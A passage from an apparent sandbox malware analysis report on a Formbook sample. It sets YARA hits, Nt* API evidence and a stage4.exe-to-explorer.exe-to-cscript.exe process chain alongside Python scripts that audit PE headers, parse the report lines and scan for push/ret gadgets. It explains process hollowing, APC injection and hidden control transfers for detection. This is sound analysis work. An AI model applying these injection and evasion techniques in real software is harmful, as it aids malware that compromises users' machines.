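    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    dirs = opt + (96 if magic == 0x10B else 112)                 # PE32 vs PE32+ data directories
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    dll_flags = struct.unpack_from("<H", pe, opt + 70)[0]
    import_rva, import_size = struct.unpack_from("<II", pe, dirs + 8)   # directory entry 1 = imports
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, *_, flags = struct.unpack_from("<8sIIIIIIHHI", pe, opt + opt_size + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"), vaddr, vsize, flags))
    return PEInfo(file_flags, dll_flags, entry_rva, import_rva, import_size, sections)


def flag_names(value: int, table) -> List[str]:
    return [name for bit, name in table.items() if value & bit]


def section_for_rva(sections: Sequence[Section], rva: int) -> Optional[Section]:
    return next((s for s in sections if s.vaddr <= rva < s.vaddr + s.vsize), None)


def audit(pe: bytes) -> List[str]:
    """The findings this report's static signatures would raise, as plain strings."""
    info, findings = parse_pe(pe), []
    for s in info.sections:
        if s.flags & MEM_WRITE and s.flags & (MEM_EXECUTE | CNT_CODE):
            findings.append(f"writeable executable section {s.name}")
        if s.name not in STANDARD_NAMES:
            findings.append(f"non-standard section name {s.name}")
    ep = section_for_rva(info.sections, info.entry_rva)
    if ep is None or ep.name not in CODE_NAMES:
        findings.append("entry point outside standard code sections")
    if info.import_rva == 0 or info.import_size == 0:
        findings.append("no import directory")
    return findings


def build_pe(sections: Sequence[Tuple[str, int, int, int]], entry_rva: int,
             import_rva: int = 0, import_size: int = 0, dll_flags: int = 0x8140) -> bytes:
    """Constructed PE32 header (DOS stub, COFF, optional header, section table); no section data."""
    img = bytearray(64)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 60, 64)                          # e_lfanew right after the DOS header
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<H", opt, 70, dll_flags)
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 104, import_rva, import_size)   # import directory entry
    img += opt
    for name, vaddr, vsize, flags in sections:
        img += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, vaddr, vsize, 0, 0, 0, 0, 0, flags)
    return bytes(img)


RX, RWX, R, RW = 0x60000020, 0xE0000020, 0x40000040, 0xC0000040
# Layout mirroring the report's findings; ".xyz" is a placeholder, the real names are not printed.
SUSPECT = build_pe([(".text", 0x1000, 0x5000, RWX), (".rdata", 0x6000, 0x1000, R), (".xyz", 0x7000, 0x2000, RX)],
                   entry_rva=0x7100)
CLEAN = build_pe([(".text", 0x1000, 0x5000, RX), (".rdata", 0x6000, 0x1000, R), (".data", 0x7000, 0x1000, RW)],
                 entry_rva=0x1200, import_rva=0x6100, import_size=0x80)

if __name__ == "__main__":
    for label, image in (("suspect", SUSPECT), ("clean", CLEAN)):
        info = parse_pe(image)
        print(label, flag_names(info.file_flags, FILE_FLAGS), flag_names(info.dll_flags, DLL_FLAGS), audit(image))
```

A writeable code section on its own is weak evidence (some packers and old linkers emit it), but together with an entry point in an unnamed section and an empty import directory it is the profile of a self-decrypting loader, which is exactly what this report's dynamic signatures (process hollowing into explorer.exe, APC injection) go on to confirm.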
Yara signature match
Matched rule Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Matched rule Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Sources matched (the page's listing breaks off after the last entry shown here):
Source: 0.2.stage4.exe.1200000.1.unpack, type: UNPACKEDPE (Formbook_1, Formbook)
Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORY (Formbook_1, Formbook)
Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORY (Formbook_1)
        Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01201174
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121C9A8
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121C9B9
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01201030
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121B8C3
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01202D89
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01202D90
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01208C6C
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01208C70
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121BCDD
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121BF11
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121CF7D
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01202FB0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_05581D55
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_05582D07
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054B0D20
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_055825DD
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054CD5E0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054E2581
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_0557D466
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054C841F
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_05581FF1
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_0557D616
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054D6E30
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_05582EF7
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054BF900
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054D4120
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_05571002
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_055828EC
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054CB090
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054E20A0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_055820A8
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_05582B28
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_0557DBD2
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054EEBB0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_055822AE
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EC9A8
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EC9B9
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010D2D89
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010D2D90
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010D8C6C
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010D8C70
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010ECF7D
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010D2FB0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 054BB150 appears 35 times
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_012185D0 NtCreateFile
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01218700 NtClose
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_012187B0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01218680 NtReadFile
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_012185CA NtCreateFile
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_012187AA NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121867C NtReadFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9560 NtWriteFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054FAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9760 NtOpenProcess
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054FA770 NtOpenThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054FA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054FB040 NtSuspendThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054FA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9A10 NtQuerySection
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9A20 NtResumeThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E85D0 NtCreateFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E8700 NtClose
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E87B0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E8680 NtReadFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E85CA NtCreateFile
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E87AA NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E867C NtReadFile
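The YARA memory matches and the Nt* native-function list above are easiest to reason about once they are parsed out of the report and grouped by process. The following Python script is an added example written for this page, not Joe Sandbox code: it reads a handful of evidence lines copied from this report (a constructed sample embedded in the script), groups YARA hits and Nt* calls by process, flags the process whose call set covers a complete hollowing sequence (unmap, write, set thread context, resume) and a section-plus-APC sequence, rebuilds the stage4.exe to explorer.exe to cscript.exe chain, and flags the script host that was started with no script path. The regular expressions, the HOLLOWING and SECTION_APC groupings, the SCRIPT_HOSTS list, and the reading of the memory-dump prefix as the hexadecimal process id (00000016 is 22, which matches the 22_2_ prefix on the cscript.exe lines) are assumptions of the example.

```python
import re
from collections import defaultdict

# Constructed sample input: evidence lines copied from this report. The parser accepts
# both the flattened form ("...stage4.exeCode function: ...") and the form with a " | "
# column separator, since both turn up in copy-pasted sandbox output.
SAMPLE_LINES = r"""
Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23
Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_012185D0 NtCreateFile
Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012187B0 NtAllocateVirtualMemory,0_2_012187B0
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054FAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_054F9A20 NtResumeThread
Source: unknown | Process created: C:\Users\user\Desktop\stage4.exe "C:\Users\user\Desktop\stage4.exe"
Source: C:\Users\user\Desktop\stage4.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
"""

SEP = r"\s*\|?\s*"   # the column separator is optional: " | " or nothing at all
# Memory dump names are <pid hex>.<round>.<id>.<base address>.<protection>.<type>.sdmp (assumed layout)
RE_YARA = re.compile(r"^Source:\s*([0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.([0-9A-F]{16})\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp, type: MEMORY"
                     + SEP + r"Matched rule:\s*(\S+)")
# Code function ids are <pid decimal>_<round>_<address>, followed by the called API names
RE_FUNC = re.compile(r"^Source:\s*(.*?)" + SEP + r"Code function:\s*(\d+)_\d+_[0-9A-F]+\s+([A-Za-z0-9_,]+)")
RE_PROC = re.compile(r"^Source:\s*(.*?)" + SEP + r"Process created:\s*(\S+)\s*(.*)$")

# Nt* sets that together make up one injection primitive (assumed groupings, not the sandbox's)
HOLLOWING = {"NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"}
SECTION_APC = {"NtCreateSection", "NtMapViewOfSection", "NtQueueApcThread"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}


def parse_report(text):
    yara = defaultdict(set)     # pid -> rule names matched in its memory
    apis = defaultdict(set)     # pid -> Nt* functions the sandbox found calls to
    images = {}                 # pid -> image path
    procs = []                  # (parent image, child image, child command line)
    for line in text.splitlines():
        if m := RE_YARA.match(line.strip()):
            yara[int(m.group(1), 16)].add(m.group(3))
        elif m := RE_FUNC.match(line.strip()):
            pid = int(m.group(2))
            images[pid] = m.group(1)
            apis[pid].update(t for t in m.group(3).split(",") if t.startswith("Nt"))
        elif m := RE_PROC.match(line.strip()):
            procs.append((m.group(1), m.group(2), m.group(3)))
    return dict(yara), dict(apis), images, procs


def injection_primitives(apis):
    """For each pid, name the primitives whose complete Nt* call set is present."""
    out = {}
    for pid, names in apis.items():
        hits = []
        if HOLLOWING <= names:
            hits.append("hollowing: unmap, write, set thread context, resume")
        if SECTION_APC <= names:
            hits.append("section mapping plus queued APC")
        out[pid] = hits
    return out


def process_chains(procs):
    """Walk child -> parent links from every leaf process up to the first unknown parent."""
    parent_of = {child: parent for parent, child, _ in procs}
    leaves = [c for c in parent_of if c not in parent_of.values()]
    chains = []
    for leaf in leaves:
        chain = [leaf]
        while parent_of.get(chain[-1], "unknown") != "unknown":
            chain.append(parent_of[chain[-1]])
        chains.append(chain)
    return chains


def hosts_without_script(procs):
    """Script hosts started with no script path: the sign of a borrowed, hollowed host process.
    Command lines are split on whitespace, which is enough for the paths in this report."""
    return [child for _, child, cmdline in procs
            if child.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS and len(cmdline.split()) <= 1]


def summarize(text):
    yara, apis, images, procs = parse_report(text)
    return {
        "formbook_pids": sorted(pid for pid, rules in yara.items() if any(r.startswith("Formbook") for r in rules)),
        "injection": injection_primitives(apis),
        "images": images,
        "chains": process_chains(procs),
        "hosts_without_script": hosts_without_script(procs),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

On the full report the same script lists the Nt* set per process, which is how the "Sample uses process hollowing technique" and "Queues an APC in another process" verdicts above can be re-derived from the evidence lines rather than taken on trust.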
Source: stage4.exe | Static PE information: No import functions for PE file found
Source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamecscript.exe` vs stage4.exe
Source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs stage4.exe
Source: stage4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\stage4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\stage4.exe "C:\Users\user\Desktop\stage4.exe"
Source: C:\Users\user\Desktop\stage4.exe | Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db
Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/0@13/3
Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\stage4.exe | Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: stage4.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe, 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe
Source: Binary string: cscript.pdb | source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0120A13B push ss; iretd 0_2_0120A13D
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121B822 push eax; ret 0_2_0121B828
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121B82B push eax; ret 0_2_0121B892
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121B88C push eax; ret 0_2_0121B892
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01215BCB push FFFFFFBFh; retf 0_2_01215BE9
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_0121B7D5 push eax; ret 0_2_0121B828
Source: C:\Users\user\Desktop\stage4.exe | Code function: 0_2_01215E2F push 7EDC995Dh; retf 0_2_01215E34
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_0550D0D1 push ecx; ret 22_2_0550D0E4
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010DA13B push ss; iretd 22_2_010DA13D
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EB82B push eax; ret 22_2_010EB892
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EB822 push eax; ret 22_2_010EB828
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EB88C push eax; ret 22_2_010EB892
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E5BCB push FFFFFFBFh; retf 22_2_010E5BE9
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EB7D5 push eax; ret 22_2_010EB828
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010E5E2F push 7EDC995Dh; retf 22_2_010E5E34
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 22_2_010EBEC8 pushad ; ret 22_2_010EBEC9
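Each line above pairs a push with the return that consumes it, which is how a control transfer is hidden from a call graph: the pushed value becomes the return address. The two addresses on a line show that the pair is not always adjacent (0_2_01215BCB to 0_2_01215BE9 is 30 bytes), while push 7EDC995Dh at 0_2_01215E2F sits exactly 5 bytes before its retf at 0_2_01215E34, i.e. the classic adjacent push imm32; retf. The following byte-level scanner is an added example written for this page, not a Joe Sandbox component; the bytes in SAMPLE_CODE are constructed to reproduce the instruction pairs named in the report plus one decoy, where the bytes 50 C3 sit inside a mov immediate, to show why a scan that is not a disassembler over-reports. The max_gap window is the example's own parameter.

```python
import struct

# Single-byte pushes, named as the report prints them
PUSH1 = {0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
         0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
         0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds", 0x60: "pushad"}
RETS = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}

# Constructed sample bytes, not taken from stage4.exe. Offsets are noted for the checks below.
SAMPLE_CODE = bytes([
    0x68, 0x5D, 0x99, 0xDC, 0x7E, 0xCB,   # 0: push 7EDC995Dh; retf        (adjacent, as the 5-byte gap in the report implies)
    0x16, 0xCF,                           # 6: push ss; iretd
    0x60, 0xC3,                           # 8: pushad; ret
    0x50, 0x90, 0x90, 0xC3,               # 10: push eax; nop; nop; ret    (gap 2)
    0x6A, 0xBF, 0x31, 0xC0, 0xCB,         # 14: push FFFFFFBFh (imm8, sign-extended); xor eax, eax; retf (gap 2)
    0xB8, 0x50, 0xC3, 0x00, 0x00,         # 19: mov eax, 0C350h: the 50 C3 inside the immediate is a decoy
])


def scan_push_ret(code: bytes, base: int = 0, max_gap: int = 0):
    """Linear byte scan for push ...; ret pairs.

    max_gap is how many bytes may separate the push from the return opcode. 0 finds
    only adjacent pairs (push target; ret used as a jump). Larger windows approach what
    the report lists, at the cost of false positives: this is not a disassembler, so a
    byte inside an immediate or a data table can look like an opcode (see the decoy).
    Returns a list of dicts with the push address, the return address, the gap and text.
    """
    hits = []
    n = len(code)
    for i in range(n):
        op = code[i]
        if op in PUSH1:
            text, after = PUSH1[op], i + 1
        elif op == 0x68 and i + 5 <= n:                       # push imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            text, after = f"push {imm:08X}h", i + 5
        elif op == 0x6A and i + 2 <= n:                       # push imm8, sign-extended to 32 bits
            imm = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF
            text, after = f"push {imm:08X}h", i + 2
        else:
            continue
        for j in range(after, min(after + max_gap, n - 1) + 1):
            if code[j] in RETS:
                hits.append({"push": base + i, "ret": base + j, "gap": j - after,
                             "text": f"{text}; {RETS[code[j]]}"})
                break
    return hits


if __name__ == "__main__":
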